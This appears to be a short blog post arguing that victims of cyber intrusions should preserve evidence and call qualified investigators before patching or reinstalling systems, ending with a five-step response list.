You have a few options: (1) you could call the police; (2) you could ignore the burglary, go get a cafe' latte double mocha espresso, and hope that the burglar leaves before anyone sees him; or (3) you could open the door to the office, shout, "Hey! Get out!", and wait for the burglar to leave.

In the real world, people routinely choose the first option. They do not run the burglar out of the house and then lock the door to preserve the scene before the police arrive, but for some reason, when it comes to cyber-crime, almost everyone chooses the third option. The burglar is long gone by the time the investigation starts. Evidence has been walked over, looked over, deleted and operating systems re-installed.

The "information assurance" community does a lousy job of ensuring that intrusions are handled appropriately. In my experience there is a community-wide knee-jerk reaction to intrusions that starts with looking at logs (rather than preserving them), moves into damage control (patching and re-installation) and then, as an afterthought, calling in people who are qualified to respond to the incident. Harlan Carvey wrote recently that he had only conducted two live acquisitions for clients, and both of those were after operating systems were reinstalled, so I assume that my experience is not unique.

This is usually a response based on emotion, not logic. I know that I'm largely preaching to the choir here, but hopefully someone will wander in during this sermon - so here's what you need to do if you have been hacked:

1. Don't panic

2. Call someone qualified to investigate the incident.

3. Let the investigators investigate, image, and analyze what has happened or is still happening.

4. Develop a plan that will allow you to mitigate damage, determine the extent of the intrusion, catch the bad guy with your incident responders/law enforcement.

5. Implement the plan.